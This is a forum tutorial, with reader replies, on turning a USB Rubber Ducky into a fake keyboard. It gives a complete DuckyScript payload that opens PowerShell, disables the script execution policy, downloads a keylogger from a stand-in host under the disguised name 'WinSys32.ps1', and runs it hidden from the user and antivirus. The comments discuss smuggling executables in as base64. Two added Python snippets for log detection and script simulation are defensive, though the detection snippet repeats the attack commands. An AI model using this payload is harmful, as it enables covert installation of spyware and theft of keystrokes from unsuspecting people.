Plug In To Win - DuckyScript [Part 1/3]

Hey Mates!

This time I have a project of mine to share with you about the USB Rubber Ducky. Some of you may already have heard of it; @Occupytheweb, for example, wrote an article about its use in Mr. Robot.

By the end of this small series you should be able to write your own scripts for hacking the box with nothing but a USB stick, and without knowing any programming language!


Structure

Part 1: How to use DuckyScript to write a FUD file downloader & executor
Part 2: How to use PowerShell (Microsoft's newer shell, which feels a lot like the Linux terminal) to write a FUD keylogger [Bonus]
Part 3: How to build your own Bad USB for around 10$


USB Rubber Ducky

[quote]“If it quacks like a keyboard and types like a keyboard, it must be a keyboard.”
~ Rubber Ducky Wiki[/quote]
This little quote tells us the main idea behind Bad USB. It's a technique that convinces the computer that we are not a USB stick (which can't execute anything on its own) but a completely normal, unsuspicious keyboard controlled by the user. That's useful because keyboards are allowed to type (wow, big surprise :wink:).

[quote]“Humans use keyboards, and computers trust humans.”
~ Rubber Ducky Wiki[/quote]
The computer thinks we're a normal user who just wants to download a file via PowerShell. That isn't forbidden, so it goes largely unnoticed. If any warning pops up, like "Don't trust files from the internet", we just press Enter and skip it, because the keyboard rules!

Do I need the Rubber Ducky?

I recommend using a Rubber Ducky for the following stuff, but it's not required. In the third part I'll explain how to build your own Bad USB for about 10$! That one will be much harder to reprogram and to work with, though, so I highly recommend buying a Rubber Ducky once you're hooked :smile:.

You can get it for $44.99 at the Hak5 shop. The decision is yours :wink:.


DuckyScript - Introduction

Now we've got a USB stick with a personality disorder, which thinks it's a keyboard, but how does it know what it has to do on the target system? The answer is a scripting language called DuckyScript. Its syntax is pretty straightforward, its requirements are nearly nonexistent and the intelligence needed is ridiculously little :smile:.

Requirements

  • Any text editor
  • Duckencoder

Text Editor

I think you’ll find one… gedit, Windows editor, vim, etc…

Duckencoder

The default Duckencoder.jar can be found on GitHub. However, I've had some problems due to different keyboard layouts and looked for an alternative, which is how I stumbled upon this thread. There you can download a custom version of the Duckencoder which supports different keyboard layouts.

DuckyScript - Our Script

I'll cover just the basics and not all the keys you can use, because those can already be found here.

Basics

  • You have to write every command on a new line
  • Don't use blank lines (I've never read that anywhere, but they seemed to break my script :confused:)
  • Use REM for comments
  • Use STRING for typing normal text (it automatically presses Shift when you use upper-case letters or symbols like !"§$)
  • Use GUI for pressing the Windows key
  • Use ENTER for pressing Enter (wow, that's insane)
  • Use DELAY to wait between commands

That's all I needed for writing my downloader & executor script!

Example Powershell Script Downloader & Executor

REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER
DELAY 1000
REM J answers the confirmation prompt (the expected letter depends on the Windows language)
STRING J
ENTER
DELAY 300

First we set the PowerShell execution policy to Unrestricted so that our script can be executed on the target system. You may have noticed that we only change the CurrentUser setting. This requires no special privileges and works just as well as changing the machine-wide setting.

REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300

Next we download the PowerShell script. This uses the .NET WebClient, which can be called from within PowerShell (during my little journey through keyloggers I found PowerShell just awesome; I highly recommend everyone to have a look at it. Maybe I'll make some basic tutorials about it in the future :wink:). The command downloads the file from the given web address, where you've put the script (http://example.net/keylogger.ps1), and saves it under the given path (as an example I use the current directory, i.e. the user's directory, and the name "WinSys32.ps1"). Then we leave the PowerShell console.

REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER

Finally we run the script as a hidden background PowerShell process. This has two big advantages:

  • The user can't easily spot it
  • It runs under the name "Windows PowerShell" with the default PowerShell icon. No user will think their own Windows is spying on them :grin:. (Oh, and AVs don't care either; more on that in the next part)
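From the defender's side, the three stages this payload types leave a recognisable trail: the policy change and the WebClient download show up in PowerShell logging, the hidden-window launch in process command-line auditing. The Python below is an example I've added, not code from the original post; it runs a simple rule over a few constructed log records (a simplified `timestamp|host|command` format standing in for a SIEM export, with made-up hostnames and times) and flags a host where all three stages appear within a short window.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real event logs) in a simplified
# "timestamp|host|command" form: the three stages of the payload above on
# one host, plus an unrelated download on another host.
SAMPLE_LOG = """2024-01-01T10:00:05|PC-7|Set-ExecutionPolicy -Scope CurrentUser Unrestricted
2024-01-01T10:00:08|PC-7|(new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
2024-01-01T10:00:11|PC-7|powershell -windowstyle hidden ./WinSys32.ps1
2024-01-01T10:05:00|PC-9|(new-object System.Net.WebClient).DownloadFile("http://example.net/update.zip", "update.zip")"""

# One stage per step of the payload; every needle must occur (case-insensitive).
STAGES = {
    "policy":   ("set-executionpolicy", "unrestricted"),
    "download": ("webclient", "downloadfile"),
    "hidden":   ("-windowstyle", "hidden"),
}
CHAIN = set(STAGES)

def parse(log_text):
    """Yield (timestamp, host, command) from the sample format."""
    for line in log_text.splitlines():
        ts, host, command = line.split("|", 2)
        yield datetime.fromisoformat(ts), host, command

def stages_hit(command):
    """Which payload stages a single command line matches."""
    low = command.lower()
    return {name for name, needles in STAGES.items() if all(n in low for n in needles)}

def find_chains(log_text, window_s=60):
    """Hosts where the policy change is followed by the other two stages
    within window_s seconds. A lone download (PC-9) is not enough."""
    per_host = {}
    for ts, host, command in parse(log_text):
        for stage in stages_hit(command):
            per_host.setdefault(host, []).append((ts, stage))
    flagged = []
    for host, events in per_host.items():
        events.sort()
        for i, (t0, stage) in enumerate(events):
            if stage != "policy":
                continue
            window = timedelta(seconds=window_s)
            later = {s for t, s in events[i:] if t - t0 <= window}
            if later >= CHAIN:
                flagged.append(host)
                break
    return flagged
```

Calling `find_chains(SAMPLE_LOG)` returns `["PC-7"]`; shrinking the window (e.g. `window_s=2`) lets the same host slip through, which is why the window should be tuned to the DELAY values a payload realistically needs.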

Full Script

Here's the full script, so that you don't have to put the pieces together yourself :wink:.

REM Download & Execute Powershell Script
REM ~ TheDoctor v1.3.3.7
REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER
DELAY 1000
REM J answers the confirmation prompt (the expected letter depends on the Windows language)
STRING J
ENTER
DELAY 300
REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300
REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER
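Before encoding, it helps to see exactly what a script will do (and, for anyone analysing a recovered script, what it typed). The Python below is an example I've added here, not code from the original post or from the Duckencoder; it interprets only the five commands from the Basics list, so anything else is reported rather than guessed, and it treats a blank line as an error because blank lines broke the script for me.

```python
# Added example, not from the original post or the Duckencoder: a tiny interpreter
# for the DuckyScript subset used above (REM, STRING, GUI, ENTER, DELAY).
SUPPORTED = {"REM", "STRING", "GUI", "ENTER", "DELAY"}

def simulate(script):
    """Return (typed_lines, hotkeys, total_delay_ms): what reaches the host on
    each ENTER, the GUI combinations in order, and the summed DELAY time.
    Raises ValueError on blank lines (they broke the author's encoded script),
    unknown commands, or a DELAY that is not a number."""
    typed, hotkeys, total_ms, buf = [], [], 0, ""
    for lineno, line in enumerate(script.splitlines(), start=1):
        if not line.strip():
            raise ValueError(f"line {lineno}: blank line")
        cmd, _, arg = line.partition(" ")   # "ENTER " (trailing space) still parses
        if cmd not in SUPPORTED:
            raise ValueError(f"line {lineno}: unsupported command {cmd!r}")
        if cmd == "DELAY":
            total_ms += int(arg)            # int() raises ValueError if not numeric
        elif cmd == "STRING":
            buf += arg                      # typed literally, no newline
        elif cmd == "GUI":
            hotkeys.append("GUI+" + arg if arg else "GUI")
        elif cmd == "ENTER":
            typed.append(buf)               # ENTER submits the buffered text
            buf = ""
        # REM: comment only, nothing is typed
    return typed, hotkeys, total_ms

def lint(script):
    """None if the script is accepted, otherwise the error message."""
    try:
        simulate(script)
    except ValueError as err:
        return str(err)
    return None

# Sample input: the "Set Execution Policy" stage of the script above.
SAMPLE = """REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER
DELAY 1000
STRING J
ENTER
DELAY 300"""
```

`simulate(SAMPLE)` gives the three typed lines, one `GUI+r` hotkey and 7600 ms of delays, so you can see at a glance that the DELAY after `STRING powershell` is the one that matters most on a slow machine.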

How To Put That Script On Your Bad USB?

With the USB Rubber Ducky it's very easy. Just take the micro-SD card, put it in a micro-SD to SD adapter and plug it into your computer. Then build the script with the Duckencoder:

Or, when you want to compile for a specific keyboard layout (only possible with the modified Duckencoder):

Where
  • -i is the input file
  • -o is the output file
  • -l is the keyboard layout (check the linked thread for all possible layouts)

Now copy the inject.bin (no other name is allowed; the script has to be named inject.bin) to the micro-SD card and plug it back into your Rubber Ducky. Finished.

With Bad USB it’s much more complicated, so I’ll explain it in the third part of the series.


Payload Collection

You can find many different DuckyScripts here. It's a good place to look for techniques you can use when writing your own scripts (or to find scripts for trolling your friends, e.g. this one :wink:). There are some very interesting ones, like mimikatz, the Utilman exploit or a WiFi password grabber.


Conclusion

Is it really that easy? Yes. Just write your own simple DuckyScript, plug in your Bad USB and… it's won :wink:. Oh, and don't forget that you'll feel like a real 1337 h4xx0r when all you have to do is plug in your stick and watch windows magically pop up and fill with commands without anyone's interaction :sunglasses:.

In the next part we'll talk about the PowerShell script you have to download. Don't expect a big introduction to PowerShell, because I'm just a beginner, but I'm looking forward to explaining some basics to you.

|-TheDoctor-|

MATE! This is soooooo good. I love it. I seriously should consider getting one… I think when I save some money up it’ll be on my list :wink:

Keep up the AWESOME work!

Great Work! Can you also cover how to interact with executables stored on the internal sd card in the next tutorials?

I thought about it too, but it seems there's no way to use any files on the SD card. The Rubber Ducky perfectly emulates a normal keyboard and as such it can't exchange data with the computer from its storage. I had two ideas to circumvent that:

  • Write the executable's byte data hardcoded into the script (an example of that technique can be found here)
  • Write custom firmware which runs an .exe named 'inject.exe' from your SD card (just an idea; probably it doesn't work because Windows forbids it? I think this would already have been implemented if it could work :wink:. Maybe some of the C guys here want to have a look at the Rubber Ducky's firmware and the possibility of running arbitrary code? It could be read from the .exe on the SD card (which seems to work; otherwise DuckyScript wouldn't work either) and run the given code in the keyboard driver's memory, couldn't it? You see, I'm just speculating :smile:. I hope more experienced low-level people can answer these questions :slight_smile:)

Anyway, it would be awesome if you could run any .exe without having to worry about downloads. And if it could be run in the driver's memory, it should have ring0 rights, which would be another benefit :wink:.

And @pry0cc Christmas is near (At least almost near :smile:). Maybe you can get one then :wink:.

I have an idea. You could base64 encrypt an executable; have it type it out and save it; then base64 decrypt.

Yep, that’s the basic idea behind the link :wink:. I think you wouldn’t even need the script he uses, just some powershell magic (As I said, I begin to love Powershell :smile:).

Don’t know much about the rubber ducky (planning to get one :grin:), but did you have a look here?

Yep, but that one is for identifying another plugged-in USB stick with the name 'DUCKY', where it then looks for a specific .exe, which is then executed :slight_smile:. If you're interested in it, I can write about it, but it requires you to plug in two sticks (the Bad USB & the stick with the .exe).

Nope, that’s not really what I wanted :slight_smile: Just a question: After the DuckyScript has been executed, can the device be used to store data?

I've found this one :smile:. If I'm right, this custom firmware can even be used as mass storage and keyboard at the same time… Maybe I can find some further information on that :wink:.

Looks nice! :sunglasses: I also found TwinDuck, which seems to do similar things (but there are some problems with it as some people write on the internet). Are you on the IRC?

Sorry, went off early yesterday, because I had to write an application for a work experience :smile:. I’ll have a look at both of them and try to figure out how it works :slight_smile:. Maybe it’ll get a place as the fourth part?

Would be great! :grinning:
